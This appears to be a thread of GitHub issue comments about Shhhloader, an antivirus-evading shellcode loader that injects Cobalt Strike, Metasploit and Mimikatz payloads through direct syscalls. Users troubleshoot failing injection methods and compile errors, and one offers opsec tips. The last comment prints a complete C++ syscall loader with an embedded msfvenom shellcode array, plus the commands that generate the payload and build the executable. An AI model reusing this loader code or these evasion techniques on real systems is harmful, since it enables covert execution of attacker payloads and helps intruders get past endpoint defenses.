Hey. For me only ProcessHollow works as shellcode execution method.

For all the other methods I receive an error while running the generated exe.

Generating:

python Shhhloader.py  -p notepad.exe    Payload.raw   -v

┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•)  - Shhhhh, AV might hear us!
┳┻|⊂ﾉ
┻┳|
[+] ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER
[+] Using notepad.exe for QueueUserAPC injection
[+] Randomizing syscall names
[+] Verbose messages enabled
[+] Saved new stub to stub.cpp
[+] Compiling new stub...
[!] a.exe has been compiled successfully!

Running:

Please wait 60 seconds...
Sandbox checks passed
hiqPjIRXkVUORsAylux FAILED to allocate memory in the current process, exiting: c000000d

:-(

Injecting in explorer.exe or notepad.exe doesn't make a difference.

Edit:

I traced it down to syscall to NtAllocateVirtualMemory. The return value is:

RAX 00000000C000000D STATUS_INVALID_PARAMETER

Please help!

hi

so i managed to only get a cobalt beacon back when using CurrentThread method. i am not sure why the other methods are not working. if you can explain the steps to help. you debug it i will be happy to assist.

OS Name: Microsoft Windows 10 Enterprise OS Version: 10.0.18363 N/A Build 18363

Hi. I'm trying a Cobalt Strike (4.7) x64 stageless shellcode, and facing some issues against a Win10 machine with:

• GetSyscallStub option. When used, I get no beacon
• EnumDisplayMonitors or ModuleStomping options. When used, I get no beacon

The only option that works for me is using default 'QueueUserAPC' without GetSyscallStub. Are you aware of these limitations or am I doing something wrong ? My AV is disabled for test purposes and I don't have any EDR either

Thanks

First Thanks for your amazing work!

The previous version was working fine but after the update it started to go wrong, I compiled the llvm following your installation tutorial! I tested if it was the llvm binaries to see if there was something wrong but everything was normal compile other .cpp files correctly

I am available to send any data or additional information

Hi, I've played around with the tool since its first release and I really must say that you and your contributors have done a really great job. The tool works fine with CS/Metasploit shellcodes, however it doesn't work with Mimikatz's shellcode (generated from Donut). It does compile successfully, but there is no output displayed when executed (no crashes at all, just no output). I've seen this type of behaviour on other tools as well, maybe it is because of the generated shellcode itself as it is 1.4 million bytes long 🤔

Looking forward to your answer :)

+] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER [+] Storing shellcode as english word list [+] Using c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe for ModuleStomping [+] Using GetSyscallStub for syscalls [+] Using domain enumeration for sandbox evasion [+] Generating DLL instead of exe [+] Randomizing syscall names [+] Saved new stub to stub.cpp [+] Compiling new stub... [+] Using Obfuscator-LLVM to compile stub... sh: 1: x86_64-w64-mingw32-clang++: not found [!] Stub compilation failed! Something went wrong!

Any suggestions?

Hey man,

Getting some OLLVM errors, wonder if you have any tips?

[+] Using Obfuscator-LLVM to compile stub...
In file included from stub.cpp:4:
In file included from /usr/x86_64-w64-mingw32/include/windows.h:69:
In file included from /usr/x86_64-w64-mingw32/include/windef.h:9:
In file included from /usr/x86_64-w64-mingw32/include/minwindef.h:163:
In file included from /usr/x86_64-w64-mingw32/include/winnt.h:1555:
In file included from /usr/bin/../lib/clang/14.0.6/include/x86intrin.h:15:
In file included from /usr/bin/../lib/clang/14.0.6/include/immintrin.h:26:
In file included from /usr/bin/../lib/clang/14.0.6/include/xmmintrin.h:3009:
/usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2378:19: error: use of undeclared identifier '__builtin_elementwise_max'
  return (__m128i)__builtin_elementwise_max((__v8hi)__a, (__v8hi)__b);
                  ^
/usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2398:19: error: use of undeclared identifier '__builtin_elementwise_max'
  return (__m128i)__builtin_elementwise_max((__v16qu)__a, (__v16qu)__b);
                  ^
/usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2418:19: error: use of undeclared identifier '__builtin_elementwise_min'
  return (__m128i)__builtin_elementwise_min((__v8hi)__a, (__v8hi)__b);
                  ^
/usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2438:19: error: use of undeclared identifier '__builtin_elementwise_min'
  return (__m128i)__builtin_elementwise_min((__v16qu)__a, (__v16qu)__b);

Thanks!

Hi there! I am running your script in a py2 environment which I had to change the following line into this:

test = ''.join(chr(ord(test) ^ ord(key[i])))

which breaks every thing. Do you have any opinion on this? Cheers!

Strip debug information from the binary for opsec and size reduction: x86_64-w64-mingw32-strip --strip-all

Add skCrypter.h headers and wrap the key with skCrypt("key") so that it is not a plaintext string: https://github.com/skadro-official/skCrypter

Hi @icyguider ! hope you are doing well. I am re-creating a tool like msfvenom using python, and in the process I am dealing with some problems related to the design complexity of msfvenom. Do you have any suggestion for me on open-source stuff which would help me achieve such a task? I have already seen projects such as Veil or OWASP ZSC, but these tools are not active any more. Cheers!

• os: Windows 7 sp 1

//generate payload
msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o calc.bin
//source code

#define _WIN32_WINNT 0x0600
#include <iostream>
#include <windows.h>
#include <psapi.h>
#include <winternl.h>
#include <tlhelp32.h>
#include "Syscalls2.h"
#ifndef UNICODE  
typedef std::string String;
#else
typedef std::wstring String;
#endif


unsigned char shellcode[276] = {
0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,
0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,
0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,
0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,
0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,
0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,
0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,
0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,
0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,
0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,
0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,
0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,
0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,
0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,
0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,
0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,
0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,
0xDA,0xFF,0xD5,0x63,0x61,0x6C,0x63,0x2E,
0x65,0x78,0x65,0x00,
};

int main()
{
    
    HANDLE hProc = GetCurrentProcess();
    DWORD oldprotect = 0;
    PVOID base_addr = NULL;
    HANDLE thandle = NULL;
    SIZE_T bytesWritten;
    size_t shellcodeSize = sizeof(shellcode) / sizeof(shellcode[0])+1;
    NTSTATUS res = NtAllocateVirtualMemory(hProc, &base_addr, 0, (PSIZE_T)&shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (res != 0){
        std::cout << "NtAllocateVirtualMemory FAILED to allocate memory in the current process, exiting: " << std::hex << res << std::endl;
        return 0;
    }
    else {
        std::cout << "NtAllocateVirtualMemory allocated memory in the current process sucessfully." << std::endl;
    }
    res = NtWriteVirtualMemory(hProc, base_addr, shellcode, shellcodeSize, &bytesWritten);
    if (res != 0){
        std::cout << "NtWriteVirtualMemory FAILED to write decoded payload to allocated memory: " << std::hex << res << std::endl;
        return 0;
    }
    else{
        std::cout << "NtWriteVirtualMemory wrote decoded payload to allocated memory successfully." << std::endl;
    }
    res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_NOACCESS, &oldprotect);
    if (res != 0){
        std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
        return 0;
    }
    else{
        std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
    }
    res = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, TRUE, 0, 0, 0, NULL);

    if (res != 0){
        std::cout << "NtCreateThreadEx FAILED to create thread in current process: " << std::hex << res << std::endl;
        return 0;
    }
    else{
        std::cout << "NtCreateThreadEx created thread in current process successfully." << std::endl;
    }
    res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_EXECUTE_READ, &oldprotect);

    if (res != 0){
        std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
        return 0;
    }
    else{
        std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
    }
    res = NtResumeThread(thandle, 0);
    if (res != 0){
        std::cout << "NtResumeThread FAILED to resume created thread: " << std::hex << res << std::endl;
        return 0;
    }
    else{
        std::cout << "NtResumeThread resumed created thread successfully." << std::endl;
    }
    res = NtWaitForSingleObject(thandle, -1, NULL);   
}
//build
x86_64-w64-mingw32-g++ stub.cpp -w -masm=intel -fpermissive -static -lpsapi -Wl,--subsystem,console -o a.exe

The test is successful in win7 and above

The output of win7 or windows 2008 is as follows

NtAllocateVirtualMemory allocated memory in the current process sucessfully.
NtWriteVirtualMemory wrote decoded payload to allocated memory successfully.
NtProtectVirtualMemory modified permissions successfully.
NtCreateThreadEx created thread in current process successfully.
NtProtectVirtualMemory modified permissions successfully.
NtResumeThread FAILED to resume created thread: c0000022